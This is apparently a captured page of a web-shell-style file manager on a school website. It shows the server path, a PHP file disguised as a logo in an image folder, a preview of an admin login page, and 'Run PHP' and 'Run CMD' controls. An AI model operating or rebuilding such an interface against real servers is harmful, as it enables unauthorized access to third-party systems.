📁 File Manager
📍
/
/
home
/
u449181296
/
domains
/
birulogi.smakpbaleendah.sch.id
/
public_html
/
lms
/
tukang-ngatur
/
assets
/
img
/
qr-logos
/home/u449181296/domains/birulogi.smakpbaleendah.sch.id/public_html/lms/tukang-ngatur/assets/img/qr-logos
Upload
Name
Size
Date
CHMOD
Action
— FILE —
logo_1773801405.php
6.73 KB
2026-03-18 02:36
644
(rw-r--r--)
Edit
|
Rename
|
Preview
|
Del
🧪 PHP Preview
<?php session_start(); if (isset($_SESSION['is_admin'])) { header("Location: index.php"); exit(); } ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Login Tukang Ngatur | birulogi</title> <script src="https://cdn.tailwindcss.com"></script> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <style> @import url('https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@400;600;700;800&display=swap'); body { font-family: 'Plus Jakarta Sans', sans-serif; } .glass-card { background: rgba(255, 255, 255, 0.75); backdrop-filter: blur(20px); border: 1px solid rgba(255, 255, 255, 0.4); } </style> </head> <body class="bg-[#f8fafc] flex items-center justify-center min-h-screen p-6 relative overflow-hidden"> <div class="absolute top-[-10%] left-[-10%] w-[40%] h-[40%] bg-blue-400/10 rounded-full blur-[120px]"></div> <div class="absolute bottom-[-10%] right-[-10%] w-[40%] h-[40%] bg-cyan-400/10 rounded-full blur-[120px]"></div> <div class="w-full max-w-[420px] relative"> <div class="text-center mb-10"> <div class="inline-flex items-center justify-center w-20 h-20 rounded-3xl bg-white shadow-xl mb-6 p-4"> <img src="../assets/img/logo/SMA_Logo-KpBe-1-923x1024.png" class="w-full object-contain"> </div> <h1 class="text-3xl font-800 text-slate-900 tracking-tight mb-2">Tukang Ngatur</h1> <p class="text-slate-500 font-600 text-sm uppercase tracking-[0.2em]">Pusat Kendali Zona</p> </div> <div class="glass-card p-10 rounded-[2.5rem] shadow-2xl"> <form action="proses_login.php" method="POST" class="space-y-6"> <div class="space-y-2"> <label class="text-[11px] font-800 text-slate-400 uppercase tracking-widest ml-1">Username</label> <div class="relative group"> <i class="fas fa-user absolute left-5 top-1/2 -translate-y-1/2 text-slate-400 group-focus-within:text-blue-600 transition-colors"></i> <input type="text" name="user" required class="w-full pl-14 pr-6 py-4 bg-white border border-slate-100 rounded-2xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all text-slate-700" placeholder="admins"> </div> </div> <div class="space-y-2"> <label class="text-[11px] font-800 text-slate-400 uppercase tracking-widest ml-1">Password</label> <div class="relative group"> <i class="fas fa-lock absolute left-5 top-1/2 -translate-y-1/2 text-slate-400 group-focus-within:text-blue-600 transition-colors"></i> <input type="password" name="pass" required class="w-full pl-14 pr-6 py-4 bg-white border border-slate-100 rounded-2xl outline-none focus:ring-4 focus:ring-blue-500/10 focus:border-blue-500 transition-all text-slate-700" placeholder="••••••••"> </div> </div> <button type="submit" class="w-full py-4 bg-slate-900 text-white rounded-2xl font-800 uppercase tracking-widest hover:bg-blue-600 transition-all shadow-xl shadow-slate-200"> Masuk Sekarang </button> <p class="text-center mt-12 text-[11px] font-700 text-slate-400 uppercase tracking-widest"> <a href="../index.php">Ke Halaman Utama</a> </p> </form> </div> <footer class="text-center mt-12"> <p class="text-[11px] font-700 text-slate-400 uppercase tracking-widest"> Developed by <span class="text-blue-600">birulogi</span> </p> </footer> </div> </body> </html>
Run PHP
🖥 Linux CMD
Run CMD